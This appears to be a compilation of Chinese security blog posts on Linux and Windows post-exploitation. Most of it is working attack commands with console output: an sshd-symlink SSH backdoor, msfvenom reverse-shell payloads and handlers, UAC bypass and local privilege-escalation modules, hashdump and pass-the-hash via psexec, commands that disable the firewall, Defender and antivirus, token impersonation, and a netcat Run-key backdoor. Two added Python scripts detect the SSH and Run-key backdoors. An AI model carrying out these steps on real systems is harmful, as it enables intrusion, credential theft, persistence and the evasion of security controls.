  • Linux post-exploitation

    2017-07-26 18:47:00
    Linux post-exploitation

    Study references:
    http://weibo.com/1869235073/B9Seswf9R?type=comment
    http://weibo.com/p/1001603723521007220513
    http://www.sohu.com/a/126011736_505860

    Summary of common Linux reverse shell methods:
    https://edu.aqniu.com/group/3/thread/22

    1. SSH penetration techniques

    1.1 Temporary SSH backdoor

    After obtaining a shell on a compromised host whose firewall imposes no restrictions, to quickly open a reachable SSH port run the following on the host:

    myles@localhost:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337

    This spawns a listener on port 31337; connect to it with root, bin, ftp or mail as the username and any password, and you are logged in. Screenshot:

    [screenshot: ssh_backdoor]

    1.2 How to kill the temporary SSH backdoor

    Once the temporary backdoor has been spawned, use the following commands if you need to kill the process.

    myles@localhost# ps -ef |grep 31337  # find the backdoor's process ID
    myles@localhost# kill -9 ssh_pid      # kill the process outright with kill -9

    [screenshot: kill_ssh_backdoor]
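    As an added defender-side example (not from the original post), the following Python script flags the pattern this section describes: an sshd binary running under another name, from a writable path, or with a port override on its command line. The process records are constructed; the `WRITABLE_PREFIXES` list and the finding texts are this example's own assumptions.

```python
"""Flag sshd processes started under another name or from a writable path.

Added defender-side example. The backdoor above works because sshd derives
its PAM service name from argv[0]; started through a symlink called "su" it
authenticates against /etc/pam.d/su instead of /etc/pam.d/sshd. The kernel
still resolves /proc/<pid>/exe to the real binary, so exe and argv[0] can be
compared.
"""
import os
from dataclasses import dataclass
from typing import Dict, List

# Directories a service daemon should never be launched from (assumed list).
WRITABLE_PREFIXES = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")


@dataclass
class ProcInfo:
    pid: int
    exe: str         # resolved target of /proc/<pid>/exe
    argv: List[str]  # /proc/<pid>/cmdline split on NUL


def sshd_findings(p: ProcInfo) -> List[str]:
    """Return indicators for one process; an empty list means it looks normal."""
    findings: List[str] = []
    # Only processes whose real executable is sshd are of interest here.
    if os.path.basename(p.exe) != "sshd" or not p.argv:
        return findings
    argv0 = p.argv[0]
    if os.path.basename(argv0) != "sshd":
        findings.append(f"sshd binary running as '{argv0}' (PAM service name spoofed)")
    if argv0.startswith(WRITABLE_PREFIXES):
        findings.append(f"launched from writable path {argv0}")
    args = p.argv[1:]
    for i, arg in enumerate(args):
        nxt = args[i + 1] if i + 1 < len(args) else ""
        if arg.startswith("-oPort="):
            findings.append(f"port overridden on command line: {arg}")
        elif (arg == "-o" and nxt.startswith("Port=")) or arg == "-p":
            findings.append(f"port overridden on command line: {arg} {nxt}")
    return findings


def scan_proc(proc_root: str = "/proc") -> Dict[int, List[str]]:
    """Walk a procfs tree and return {pid: findings} for suspicious sshd processes."""
    hits: Dict[int, List[str]] = {}
    if not os.path.isdir(proc_root):
        return hits  # not a Linux host (or procfs not mounted)
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        pid = int(entry)
        try:
            exe = os.readlink(f"{proc_root}/{pid}/exe")
            with open(f"{proc_root}/{pid}/cmdline", "rb") as fh:
                argv = [a.decode("utf-8", "replace") for a in fh.read().split(b"\0") if a]
        except OSError:
            continue  # process exited, or another user's process without root
        found = sshd_findings(ProcInfo(pid, exe, argv))
        if found:
            hits[pid] = found
    return hits


# Constructed records mirroring the transcript: the normal daemon, the symlinked
# copy started as "/tmp/su -oPort=31337", and an unrelated process named "su".
SAMPLE_PROCS = [
    ProcInfo(812, "/usr/sbin/sshd", ["/usr/sbin/sshd", "-D"]),
    ProcInfo(4711, "/usr/sbin/sshd", ["/tmp/su", "-oPort=31337"]),
    ProcInfo(4720, "/usr/bin/bash", ["/tmp/su"]),
]

if __name__ == "__main__":
    for proc in SAMPLE_PROCS:
        for finding in sshd_findings(proc):
            print(f"pid {proc.pid}: {finding}")
    for pid, found in scan_proc().items():  # live check; run as root for full view
        print(f"pid {pid}: {'; '.join(found)}")
```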

  • Meterpreter post-exploitation

    2020-05-05 15:33:31

    Meterpreter post-exploitation

    Characteristics

    Meterpreter is an extension module of the Metasploit framework, used as the payload once an exploit succeeds; after a successful exploit the payload hands us back a control channel. Using it as the payload yields a meterpreter shell connection to the target system. As a post-exploitation module the Meterpreter shell has many useful functions, such as adding a user, hiding things, opening a shell, obtaining user passwords, uploading and downloading files on the remote host, running cmd.exe, capturing the screen, obtaining remote control, capturing keystrokes, clearing applications, displaying the remote host's system information, and displaying the remote machine's network interfaces and IP addresses. Meterpreter can also evade intrusion detection systems: it hides itself on the remote host and does not change files on the system's hard disk, so a HIDS (host-based intrusion detection system) has difficulty responding to it. In addition, its system time varies while it runs, so tracking or terminating it becomes very difficult even for an experienced person. Finally, Meterpreter simplifies tasks by creating multiple sessions, which can be used for further penetration.

    Advantages of how Meterpreter works

    1. Creates no new process (uses memory injection)
    2. Meterpreter is an interpreter that loads various attack commands
    3. Runs in the context of the exploited process
    4. Communication is encrypted (TLV protocol) and can evade IDS
    5. No writes to the hard disk
    6. Communication is channel-based; it can work with several channels at once (multi-channel)
    7. Supports writing extensions

    How Meterpreter works

    1. Exploit code + first-stage payload
    2. The payload connects back to msf
    3. The second-stage payload is sent
    4. Client and server communicate

    Common system commands

    background: put the current session in the background and resume it when needed
    getuid: show the user the target is running as
    ps: list all processes
    getpid: return the PID in which meterpreter is running
    sysinfo: show system information and architecture
    shell: switch to a cmd shell with system privileges
    exit: leave the shell session back to meterpreter, or terminate meterpreter

    Process migration and privilege escalation

    getsystem: automatically tries a variety of system weaknesses to escalate privileges
    migrate <pid>: migrate into the given process

    Establishing multiple communication channels with the target

    execute: used to open additional communication channels
    execute -f exploit.exe -c
    channel -l: list the available channels
    interact: interact with a channel (gives a cmd)
    write 3: write data to channel 3, terminated by '.'

    Common file system commands

    pwd: show the current working directory
    cd: change to the desired working directory
    search -f *.doc -d c:\ : search for files
    download: file download
    download c:\a.doc /root: download to the local /root directory
    upload /root/mm.exe c:\sys.exe: upload to the remote host
    timestomp: change file attributes
    timestomp c:/a.doc -v: view the file's time information
    timestomp c:/a.doc -c "9/23/2013 14:22:11": change the file's creation time
    -m, -a: the modification time and the last access time
    -z: change all times; avoid if possible
    -v: view

    Common network commands

    ipconfig: view the IP configuration
    route: display the routing table; can also configure addresses, the same way as on Linux
    route add ip netmask gateway
    portfwd: used for port forwarding
    portfwd -a -L 127.0.0.1 -l 888 -h 7.6.5.4 -p 5631
    -a: add a new forwarding rule
    -L: IP address of the target host
    Connections to 127.0.0.1:888 are forwarded to 7.6.5.4:5631
    enumdesktops: list all accessible desktops
    getdesktop: return the user's desktop
    setdesktop: switch to the desktop of a given session
    keyscan_start: install the keystroke logger
    keyscan_dump: dump the keystrokes recorded on the active desktop
    Windows desktop numbering: 0 is the console; 1 and 2 are other sessions or remote logons.

    Meterpreter scripts

    Run them with run <scriptname>

    1. VNC script: get VNC control of the remote machine's desktop
    meterpreter > run vnc
    meterpreter > run screen_unlock

    2. Process migration
    After a successful exploit, migrate the connection out of an unstable process (for example the browser, when a browser exploit was used, since the target may close it) into a stable one (explorer.exe) to keep the connection alive.
    Example:
    meterpreter > run post/windows/manage/migrate
    (On 64-bit Windows 7, migrate only succeeds if the backdoor was run with administrator privileges, and the privileges held before and after migrate differ.)

    3. Disable antivirus software
    meterpreter > run killav   (use this script with care; it may blue-screen the target.)

    4. Dump the system password hashes
    meterpreter > run hashdump
    (On 64-bit Windows 7 the backdoor must run with administrator privileges and getsystem must be done first; then
    run post/windows/gather/hashdump dumps the hashes more reliably.
    Also, to add a system account from a shell on Windows 7 you first need
    run post/windows/escalate/bypassuac, otherwise it may fail.)

    5. Capture system traffic
    meterpreter > run packetrecorder -i 1

    6. Go straight for the prize
    It can do many things: grab passwords, download the registry, collect system information, etc.
    meterpreter > run scraper

    7. Persistence
    Keep control of the target machine even after it reboots
    meterpreter > run persistence -X -i 50 -p 443 -r 192.168.1.111
    -X start at boot; -i connection timeout; -p port; -r IP
    For the next connection:
    msf > use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LPORT 443
    set LHOST 192.168.1.111
    exploit
    (This writes files under random names to the following locations and registry key, for example:
    C:\Users\YourUserName\AppData\Local\Temp\MXIxVNCy.vbs
    C:\Users\YourUserName\AppData\Local\Temp\radF871B.tmp\svchost.exe
    HKLM\Software\Microsoft\Windows\CurrentVersion\Run\DjMzwzCDaoIcgNP)

    Basic commands

    meterpreter > background
    msf exploit(ms08_067_netapi) > sessions
    msf exploit(ms08_067_netapi) > sessions -i 1
    meterpreter > quit
    meterpreter > shell

    File system
    meterpreter > cat c:\boot.ini
    meterpreter > getwd
    meterpreter > upload -h
    meterpreter > upload netcat.exe c:\\
    meterpreter > download "C:\Program Files\Tencent\QQ\User\13456\Msg2.0.db" /etc
    Open it with QQlogger
    meterpreter > edit c:\windows\system32\drivers\etc\hosts
    meterpreter > search -h

    Network commands
    Meterpreter >ipconfig
    Meterpreter >portfwd -h
    Meterpreter >route

    System commands
    Meterpreter >ps
    Meterpreter >migrate
    Meterpreter >execute
    Meterpreter >sysinfo
    Meterpreter >info

  • Metasploit post-exploitation phase

    1. Obtaining a normal user account

    • Expanding the foothold after gaining control of the target system

      • Privilege escalation
      • Information gathering
      • Penetrating the internal network
      • Permanent backdoor
    • Expanding the foothold from an existing session

      • msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.6.128 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o payload.exe

    • Start Apache to deliver the payload

    root@kali:~# /etc/init.d/apache2 start 
    [ ok ] Starting apache2 (via systemctl): apache2.service.
    root@kali:~# cp payload.exe /var/www/html/
    

     

    • Kali listens on port 4444

      msf > use exploit/multi/handler
      msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
      msf exploit(multi/handler) > set LHOST 192.168.6.128
      msf exploit(multi/handler) > exploit -j
      
    • Run payload.exe on the Windows system

    • Kali gets a meterpreter session

      msf exploit(multi/handler) > exploit 
      
      [*] Started reverse TCP handler on 192.168.6.128:4444 
      [*] Sending stage (179779 bytes) to 192.168.6.129
      [*] Meterpreter session 1 opened (192.168.6.128:4444 -> 192.168.6.129:49161) at 2018-09-01 18:10:29 +0800
      
      meterpreter > getuid 
      Server username: vv-PC\vv
      
      

    2. Obtaining SYSTEM account privileges

    • Privilege escalation fails, usually because of UAC restrictions

      meterpreter > getuid
      Server username: WIN7-VM\John
      meterpreter > load priv
      [-] The 'priv' extension has already been loaded.
      meterpreter > getsystem 
      [-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
      [-] Named Pipe Impersonation (In Memory/Admin)
      [-] Named Pipe Impersonation (Dropper/Admin)
      [-] Token Duplication (In Memory/Admin)
      
      
      meterpreter > background
      
    • Bypassing the UAC restriction

      • use exploit/windows/local/ask

        msf exploit(multi/handler) > use exploit/windows/local/ask
        msf exploit(windows/local/ask) > set payload windows/meterpreter/reverse_tcp
        payload => windows/meterpreter/reverse_tcp
        msf exploit(windows/local/ask) > set lhost 192.168.6.128
        lhost => 192.168.6.128
        msf exploit(windows/local/ask) > set filename win_updata.exe
        filename => win_updata.exe
        msf exploit(windows/local/ask) > set session 1
        session => 1
        msf exploit(windows/local/ask) > options 
        
        Module options (exploit/windows/local/ask):
        
           Name       Current Setting  Required  Description
           ----       ---------------  --------  -----------
           FILENAME   win_updata.exe   no        File name on disk
           PATH                        no        Location on disk, %TEMP% used if not set
           SESSION    1                yes       The session to run this module on.
           TECHNIQUE  EXE              yes       Technique to use (Accepted: PSH, EXE)
        
        
        Payload options (windows/meterpreter/reverse_tcp):
        
           Name      Current Setting  Required  Description
           ----      ---------------  --------  -----------
           EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
           LHOST     192.168.6.128    yes       The listen address (an interface may be specified)
           LPORT     4444             yes       The listen port
        
        
        Exploit target:
        
           Id  Name
           --  ----
           0   Windows
        

        Obtain administrator privileges via getsystem

        msf exploit(windows/local/ask) > exploit 
        
        [*] Started reverse TCP handler on 192.168.6.128:4444 
        [*] UAC is Enabled, checking level...
        [*] The user will be prompted, wait for them to click 'Ok'
        [*] Uploading win_updata.exe - 73802 bytes to the filesystem...
        [*] Executing Command!
        [*] Sending stage (179779 bytes) to 192.168.6.129
        [*] Meterpreter session 2 opened (192.168.6.128:4444 -> 192.168.6.129:49162) at 2018-09-01 18:15:00 +0800
        
        meterpreter > getuid 
        Server username: vv-PC\vv
        meterpreter > getsystem 
        ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
        meterpreter > getuid 
        Server username: NT AUTHORITY\SYSTEM
        

         

      • use exploit/windows/local/bypassuac

        msf exploit(windows/local/ask) > use exploit/windows/local/bypassuac
        msf exploit(windows/local/bypassuac) > set payload windows/meterpreter/reverse_tcp
        payload => windows/meterpreter/reverse_tcp
        msf exploit(windows/local/bypassuac) > set session 1
        session => 1
        msf exploit(windows/local/bypassuac) > set lhost  192.168.6.128
        lhost => 192.168.6.128
        msf exploit(windows/local/bypassuac) > show options 
        
        Module options (exploit/windows/local/bypassuac):
        
           Name       Current Setting  Required  Description
           ----       ---------------  --------  -----------
           SESSION    1                yes       The session to run this module on.
           TECHNIQUE  EXE              yes       Technique to use if UAC is turned off (Accepted: PSH, EXE)
        
        
        Payload options (windows/meterpreter/reverse_tcp):
        
           Name      Current Setting  Required  Description
           ----      ---------------  --------  -----------
           EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
           LHOST     192.168.6.128    yes       The listen address (an interface may be specified)
           LPORT     4444             yes       The listen port
        
        
        Exploit target:
        
           Id  Name
           --  ----
           0   Windows x86
        
        msf exploit(windows/local/bypassuac) > exploit 
        
        [*] Started reverse TCP handler on 192.168.6.128:4444 
        [*] UAC is Enabled, checking level...
        [+] UAC is set to Default
        [+] BypassUAC can bypass this setting, continuing...
        [+] Part of Administrators group! Continuing...
        [*] Uploaded the agent to the filesystem....
        [*] Uploading the bypass UAC executable to the filesystem...
        [*] Meterpreter stager executable 73802 bytes long being uploaded..
        [*] Sending stage (179779 bytes) to 192.168.6.129
        [*] Meterpreter session 3 opened (192.168.6.128:4444 -> 192.168.6.129:49165) at 2018-09-01 18:21:37 +0800
        
        meterpreter > getuid 
        Server username: vv-PC\vv
        meterpreter > getsystem 
        ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
        meterpreter > getuid 
        Server username: NT AUTHORITY\SYSTEM
        

         

      • use exploit/windows/local/bypassuac_injection

        msf exploit(windows/local/bypassuac_injection) > use exploit/windows/local/bypassuac_injection
        msf exploit(windows/local/bypassuac_injection) > set payload windows/meterpreter/reverse_tcp
        payload => windows/meterpreter/reverse_tcp
        msf exploit(windows/local/bypassuac_injection) > set session 1
        session => 1
        msf exploit(windows/local/bypassuac_injection) > set lhost 192.168.6.128
        lhost => 192.168.6.128
        msf exploit(windows/local/bypassuac_injection) > options 
        
        Module options (exploit/windows/local/bypassuac_injection):
        
           Name     Current Setting  Required  Description
           ----     ---------------  --------  -----------
           SESSION  1                yes       The session to run this module on.
        
        
        Payload options (windows/meterpreter/reverse_tcp):
        
           Name      Current Setting  Required  Description
           ----      ---------------  --------  -----------
           EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
           LHOST     192.168.6.128    yes       The listen address (an interface may be specified)
           LPORT     4444             yes       The listen port
        
        
        Exploit target:
        
           Id  Name
           --  ----
           0   Windows x86
        
        msf exploit(windows/local/bypassuac_injection) > exploit 
        
        [*] Started reverse TCP handler on 192.168.6.130:4444 
        [+] Windows 7 (Build 7601, Service Pack 1). may be vulnerable.
        [*] UAC is Enabled, checking level...
        [+] Part of Administrators group! Continuing...
        [+] UAC is set to Default
        [+] BypassUAC can bypass this setting, continuing...
        [*] Uploading the Payload DLL to the filesystem...
        [*] Spawning process with Windows Publisher Certificate, to inject into...
        [+] Successfully injected payload in to process: 3236
        [*] Sending stage (179779 bytes) to 192.168.6.154
        [*] Meterpreter session 2 opened (192.168.6.130:4444 -> 192.168.6.154:49175) at 2018-09-01 20:57:42 +0800
        
        meterpreter > getuid 
        Server username: vv-PC\vv
        meterpreter > getsystem 
        ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
        meterpreter > getuid 
        Server username: NT AUTHORITY\SYSTEM
        
        

         

    • Exploit a vulnerability to escalate directly to SYSTEM

      • use exploit/windows/local/ms13_053_schlamperei (unsuccessful)

        use exploit/windows/local/ms13_053_schlamperei
        set SESSION 1
        

      • use exploit/windows/local/ms13_081_track_popup_menu (reboots the target: a DoS)

        use exploit/windows/local/ms13_081_track_popup_menu
        set SESSION 1
        exploit
        

      • use exploit/windows/local/ms13_097_ie_registry_symlink

        use exploit/windows/local/ms13_097_ie_registry_symlink
        set SESSION 1
        set URIPATH /
        set payload windows/meterpreter/reverse_tcp
        set LHOST 10.0.0.128
        set SRVHOST 10.0.0.128
        exploit
        
      • use exploit/windows/local/ppr_flatten_rec

        use exploit/windows/local/ppr_flatten_rec
        set SESSION 1
        exploit
        

    • Graphical payload

      • set payload windows/vncinject/reverse_tcp

        use exploit/windows/local/ppr_flatten_rec
        set payload windows/vncinject/reverse_tcp
        set SESSION 1
        set LHOST 10.0.0.128
        set ViewOnly false
        exploit
        

     

    • Disable UAC

      • Get the hashdump

        meterpreter > hashdump
            Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
            Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
            John:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
        
      • Try to use it

        use exploit/windows/smb/psexec
        set RHOST 10.0.0.132
        set SMBUser John
        set SMBPass  aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
        set payload windows/meterpreter/reverse_tcp
        set LHOST 10.0.0.128
        exploit
        

        Error: Exploit failed [no-access]

      • UAC has to be disabled beforehand

        sessions -i 2
        shell
        cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
        shutdown -r -t 0
        

      • Try again

        use exploit/windows/smb/psexec
        set RHOST 10.0.0.132
        set SMBUser John
        set SMBPass  aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
        set payload windows/meterpreter/reverse_tcp
        set LHOST 10.0.0.128
        exploit
        

    4. Basic operations

    1. Disable the firewall

    • Requires administrator or SYSTEM privileges

      netsh advfirewall set allprofiles state on
      netsh advfirewall set allprofiles state off
      

    2. Stop WinDefend

    • Look up the service name

    • Stop the service

      net stop windefend
      

    3. BitLocker encryption

    • manage-bde -off C:
    • manage-bde -status C:

    4. Disable DEP

    • bcdedit.exe /set {current} nx AlwaysOff

    5. Kill antivirus software

    • run killav
    • run post/windows/manage/killav

    6. Enable Remote Desktop

    # enable the service
    run post/windows/manage/enable_rdp
    

    # disable the service
    run multi_console_command -rc /root/.msf4/loot/20180418001805_default_10.0.0.132_host.windows.cle_842354.txt
    
    # enable the service
    run getgui -e
    run getgui -u yuanfh -p pass
    run multi_console_command -rc /root/.msf4/logs/scripts/getgui/clean_up__20160824.1855.rc
    

    7. View the remote desktop

    • screenshot
    • use espia
      • screengrab

    5. Using tokens to attack the domain controller

    - Tokens
    - Every time a user logs on, a temporary token is bound to the account
    - When accessing resources the token is presented for authentication, similar to web cookies
    - Delegate tokens: interactive logon sessions
    - Impersonate tokens: non-interactive logon sessions
    - Once the account logs off, a delegate token becomes an impersonate token and its privileges remain valid

    • Incognito

      • A stand-alone tool that msf integrated into meterpreter
      • No password, cracking, or password hash needed: steal tokens to impersonate another user
      • Especially useful for escalating privileges across many systems in a domain environment
    • Set up a domain environment

      • DC + XP
    • load incognito

      • list_tokens -u
      • impersonate_token lab\administrator
      • The commands above require getsystem
        • A local low-privilege user first needs local privilege escalation
        • use exploit/windows/local/ms10_015_kitrap0d
        • execute -f cmd.exe -i -t  # -t: run the program with the currently impersonated token
        • shell

    8. Registry

    • The registry holds almost all of Windows' configuration parameters

      • An incorrect modification can crash the system outright
      • Make a full backup of the registry before modifying it
      • Some registry changes are irreversible
    • Common uses

      • Modify or add startup entries
      • Steal secrets stored in the registry
      • Evade file-based antivirus scanning
    • Add an nc backdoor service via the registry (meterpreter)

    meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
    [*] uploading  : /usr/share/windows-binaries/nc.exe -> C:\windows\system32
    [*] uploaded   : /usr/share/windows-binaries/nc.exe -> C:\windows\system32\nc.exe
    meterpreter > reg 
    Usage: reg [command] [options]
    
    Interact with the target machine's registry.
    
    OPTIONS:
    
        -d <opt>  The data to store in the registry value.
        -h        Help menu.
        -k <opt>  The registry key path (E.g. HKLM\Software\Foo).
        -r <opt>  The remote machine name to connect to (with current process credentials
        -t <opt>  The registry value type (E.g. REG_SZ).
        -v <opt>  The registry value name (E.g. Stuff).
        -w        Set KEY_WOW64 flag, valid values [32|64].
    COMMANDS:
    
        enumkey	Enumerate the supplied registry key [-k <key>]
        createkey	Create the supplied registry key  [-k <key>]
        deletekey	Delete the supplied registry key  [-k <key>]
        queryclass Queries the class of the supplied key [-k <key>]
        setval	Set a registry value [-k <key> -v <val> -d <data>]
        deleteval	Delete the supplied registry value [-k <key> -v <val>]
        queryval	Queries the data contents of a value [-k <key> -v <val>]
    
    
    meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
    Enumerating: HKLM\software\microsoft\windows\currentversion\run
    
      Values (1):
    
    	VMware                    # the processes started at boot
    
    meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'    # create the value
    Successfully set nc of REG_SZ.
    meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
    Key: HKLM\software\microsoft\windows\currentversion\Run
    Name: nc
    Type: REG_SZ
    Data: C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe
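    Added example (not part of either post): a Python audit of the Run key for the two persistence patterns this page shows, the nc value just created and the randomly named value the persistence script writes (`DjMzwzCDaoIcgNP`, pointing at a `.vbs` under `%TEMP%`). It parses the text that `reg query <key>` prints; the sample output and the scoring heuristics are constructed for this example, not Metasploit's.

```python
"""Audit HKLM/HKCU Run entries for the persistence patterns shown on this page.

Added example. Input is the text printed by `reg query <key>` on Windows:
    <4 spaces><value name><4 spaces><REG_TYPE><4 spaces><data>
The scoring rules below are this example's own heuristics.
"""
import re
from typing import Dict, List, NamedTuple

RUN_KEYS = [
    r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
]
VALUE_RE = re.compile(r"^\s{4}(?P<name>.+?)\s{4}(?P<type>REG_\w+)\s{4}(?P<data>.*)$")


class RunEntry(NamedTuple):
    key: str
    name: str
    data: str


def parse_reg_query(text: str) -> List[RunEntry]:
    """Parse `reg query` output; key-path lines start at column 0."""
    entries: List[RunEntry] = []
    key = ""
    for line in text.splitlines():
        if line and not line[0].isspace():
            key = line.strip()
            continue
        m = VALUE_RE.match(line)
        if m:
            entries.append(RunEntry(key, m["name"], m["data"]))
    return entries


def looks_random(name: str) -> bool:
    """Heuristic: letters only, at least 8 long, and the case flips unusually often."""
    letters = [c for c in name if c.isalpha()]
    if len(letters) < 8 or len(letters) != len(name):
        return False
    flips = sum(1 for a, b in zip(letters, letters[1:]) if a.isupper() != b.isupper())
    return flips / len(letters) >= 0.45


def assess(entry: RunEntry) -> List[str]:
    """Return the reasons an autorun entry deserves a closer look (empty = clean)."""
    low = entry.data.lower()
    findings: List[str] = []
    if re.search(r"\\appdata\\local\\temp\\|\\windows\\temp\\|%temp%", low):
        findings.append("executable lives in a temp directory")
    if re.search(r"\\nc(64)?\.exe\b|\\ncat\.exe\b", low):
        findings.append("netcat binary used as an autorun")
    if re.search(r"\s-e\s+(cmd|powershell)(\.exe)?\b", low):
        findings.append("shell handed to a network listener (-e cmd.exe)")
    if re.search(r"\.(vbs|js|wsf|ps1|bat)\b", low):
        findings.append("script file rather than a signed executable")
    if looks_random(entry.name):
        findings.append("randomly generated value name")
    return findings


def audit_text(text: str) -> Dict[str, List[str]]:
    """Map '<key>\\<name>' to its findings, skipping entries that look clean."""
    report: Dict[str, List[str]] = {}
    for e in parse_reg_query(text):
        found = assess(e)
        if found:
            report[f"{e.key}\\{e.name}"] = found
    return report


# Constructed `reg query` output: one legitimate entry, the nc value created
# above, and a persistence-script style value (name from the earlier post).
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    VMware User Process    REG_SZ    "C:\Program Files\VMware\VMware Tools\vmtoolsd.exe" -n vmusr
    nc    REG_SZ    C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe
    DjMzwzCDaoIcgNP    REG_SZ    C:\Users\vv\AppData\Local\Temp\MXIxVNCy.vbs
"""

if __name__ == "__main__":
    # On a Windows host, feed in the output of `reg query <key>` for each
    # path in RUN_KEYS instead of the constructed sample.
    for path, reasons in audit_text(SAMPLE_REG_QUERY).items():
        print(path)
        for reason in reasons:
            print("   -", reason)
```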

     

    • Open a firewall port (meterpreter)

    
    meterpreter > execute -f cmd -i -H
    Process 2276 created.
    Channel 5 created.
    Microsoft Windows [Version 6.1.7601]
    Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
    
    C:\Users\vv\Desktop>netsh firewall show opmode      # show the firewall status
    netsh firewall show opmode
    
    Domain profile configuration:
    -------------------------------------------------------------------
    Operational mode                  = Disable
    Exception mode                    = Enable
    
    Standard profile configuration (current):
    -------------------------------------------------------------------
    Operational mode                  = Enable
    Exception mode                    = Enable
    
    IMPORTANT: Command executed successfully.
    However, "netsh firewall" is deprecated;
    use "netsh advfirewall firewall" instead.
    For more information on using "netsh advfirewall firewall" commands
    instead of "netsh firewall", see KB article 947709
    at http://go.microsoft.com/fwlink/?linkid=121488 .
    
    
    
    C:\Users\vv\Desktop>netsh firewall add portopening TCP 444 "test" ENABLE ALL
    netsh firewall add portopening TCP 444 "test" ENABLE ALL     # add a firewall rule
    
    IMPORTANT: Command executed successfully.
    However, "netsh firewall" is deprecated;
    use "netsh advfirewall firewall" instead.
    For more information on using "netsh advfirewall firewall" commands
    instead of "netsh firewall", see KB article 947709
    at http://go.microsoft.com/fwlink/?linkid=121488 .
    
    Ok.
    
    
    C:\Users\vv\Desktop>shutdown -r -f -t 0                  # reboot the target so the change takes effect
    
    
    
    
    
    

    9. Packet capture

    • Packet capture (meterpreter)
      • load sniffer
      • sniffer_interfaces
      • sniffer_start 2
      • sniffer_dump 2 1.cap / sniffer_dump 2 2.cap
      • Packets are kept in a circular buffer in memory (50000 packets); nothing is written to disk
      • Meterpreter's own traffic is filtered out intelligently, and the whole transfer is SSL/TLS encrypted
    meterpreter > load sniffer 
    Loading extension sniffer...Success.
    meterpreter > help 
    Sniffer Commands
    ================
    
        Command             Description
        -------             -----------
        sniffer_dump        Retrieve captured packet data to PCAP file
        sniffer_interfaces  Enumerate all sniffable network interfaces
        sniffer_release     Free captured packets on a specific interface instead of downloading them
        sniffer_start       Start packet capture on a specific interface
        sniffer_stats       View statistics of an active capture
        sniffer_stop        Stop packet capture on a specific interface
    
    meterpreter > sniffer_interfaces 
    
    1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
    2 - 'Intel(R) PRO/1000 MT Network Connection' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
      
    meterpreter > sniffer_start 2
    [*] Capture started on interface 2 (50000 packet buffer)
    meterpreter > sniffer_dump 2 1.cap
    [*] Flushing packet capture buffer for interface 2...
    [*] Flushed 164 packets (20244 bytes)
    [*] Downloaded 100% (20244/20244)...
    [*] Download completed, converting to PCAP...
    [*] PCAP file written to 1.cap
    meterpreter > sniffer_dump 2 2.cap
    [*] Flushing packet capture buffer for interface 2...
    [*] Flushed 686 packets (182326 bytes)
    [*] Downloaded 100% (182326/182326)...
    [*] Download completed, converting to PCAP...
    [*] PCAP file written to 2.cap
    

     

    • Decoding
      • use auxiliary/sniffer/psnuffle
      • set PCAPFILE /root/1.cap
    meterpreter > background 
    [*] Backgrounding session 1...
    msf exploit(multi/handler) > use auxiliary/sniffer/psnuffle 
    msf auxiliary(sniffer/psnuffle) > options 
    
    Module options (auxiliary/sniffer/psnuffle):
    
       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       FILTER                      no        The filter string for capturing traffic
       INTERFACE                   no        The name of the interface
       PCAPFILE                    no        The name of the PCAP capture file to process
       PROTOCOLS  all              yes       A comma-delimited list of protocols to sniff or "all".
       SNAPLEN    65535            yes       The number of bytes to capture
       TIMEOUT    500              yes       The number of seconds to wait for new data
    
    
    Auxiliary action:
    
       Name     Description
       ----     -----------
       Sniffer  
    
    msf auxiliary(sniffer/psnuffle) > set pcapfile 2.cap
    pcapfile => 2.cap
    msf auxiliary(sniffer/psnuffle) > exploit 
    [*] Auxiliary module running as background job 0.
    msf auxiliary(sniffer/psnuffle) > 
    [*] Loaded protocol FTP from /usr/share/metasploit-framework/data/exploits/psnuffle/ftp.rb...
    [*] Loaded protocol IMAP from /usr/share/metasploit-framework/data/exploits/psnuffle/imap.rb...
    [*] Loaded protocol POP3 from /usr/share/metasploit-framework/data/exploits/psnuffle/pop3.rb...
